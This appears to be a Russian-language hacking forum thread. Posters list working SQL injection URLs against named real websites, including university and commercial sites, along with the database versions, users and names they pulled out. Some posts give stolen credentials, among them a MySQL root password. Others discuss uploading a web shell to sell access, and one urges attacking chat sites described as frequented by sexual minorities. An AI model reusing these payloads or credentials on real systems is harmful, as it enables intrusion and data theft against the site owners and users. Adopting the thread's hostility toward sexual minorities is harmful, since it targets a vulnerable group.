http://www.msfacts.org/online_newsDetails.php?ID=-123+union+select+1,2,version(),user(),5,database()/*

version:4.0.24-standard
user:root@localhost
database:msf_db

С мускула логин и пароль

root:SQLadmin

Е***шим по беспределу буржуйские чаты....
Вроде как сексуальные меньшинства там еще тусуются!!!
Смело помогаем админить этот отвратительный ресурс!!!

http://www.prassel.nu/index.php?page=ads&adno=-1+union+select+concat_ws
(0x3a3a,name,password,email),2,3+from+user+limit+1 ,1--

login:mats
pass:lkll00lkll00

http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10--
5.0.67 - greetingcard@localhost - greetingcard_org_-_maindb
--------------------------------
http://www.simonsig.co.za/about.php?id=-1+union+select+1,concat_ws(char(3245,32),version() ,user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
5.0.51a-3ubuntu5.1-log? simonsig@web-02.adept.co.za? simonsig
-------------------
http://catalog.belstrin.ru/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24--
4.1.21-standard-log - clclon_user@localhost - clclon_catalogbelstrin
---------------------------
http://vis.vis-belogorje.ru/site.php?id=-1+union+select+concat_ws(char(32,45,32),version(%2 0),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24--
4.1.21-standard-log - clclon_user@localhost - clclon_visbelogorje
-----------------------------

_http://rifma.ru

http://rifma.ru/rifma.php?curr_node=55+union+select+1,concat(user_ name,char(58),user_password),3,4,5,6,7,8+from+user s+limit+0,1/*

Скуля есть, но вывод не сделал есть фильтрация в параметре "curr_node". Если не сложно подскажите как обойти.

Заранее спасибо.

http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9--
5.0.27-standard-log - WebUser@localhost - cgsc
PR: 6
-------------------------
http://www.adilsoz.kz/site.php?id=7&lan=english&newsid=-1+union+select+concat_ws(char(32,45,32),version(), user(),database())--
5.0.41-community-nt - adilsoz@localhost - adilsoz
ТИЦ: 160
PR: 2
-----------------------
http://www.oxygenna.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8--
5.0.27-community-nt - oxygenna@localhost - oxygenna
PR: 3
--------------------
http://epodsolar.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
4.1.20 - epodsol_usr1@localhost - epodsol_cm
PR: 5
-------------------
http://gavlab.auburn.edu/about.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4--
4.1.22-log - gavlab@web1.duc.auburn.edu - gavlab
PR: 4
--------------------
http://www.swiss.org.nz/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,4 5,32),version(),user(),database()),10,11,12,13,14, 15,16,17,18,19--
4.1.21-standard-log - swisst@117.104.160.18 - swisst db
ТИЦ : 10 PR: 4
----------------------
http://www.poveditions.com/home.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
ТИЦ : 10 PR: 4
----------------------

masternet, в http://cgsc2.biology.yale.edu кавычки не фильтруются и file priv разрешен. Найдешь путь - зальешь шелл))

а как путь узнать?вот в чём вопрос..так бы уже залил и продал)
у меня в дампере также..
Y - file priv

masternet,
Тема не для вопросов и комментариев
Tigger
С чего ты взял, что file_priv Y ?

http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,file_priv,3,4,5,6,7,8,9+from+mysq l.user+where+user='WebUser'--
"N"

version( 5.0.15-standard )
user( toutec@localhost )
database( toutec ) ##########
version( 4.1.15-Debian_1ubuntu5-log )
user( webrider@localhost )
database( webridershop )

##############
version( 4.1.22-log )
user( formule19@10.0.0.78 )
database( formule19 )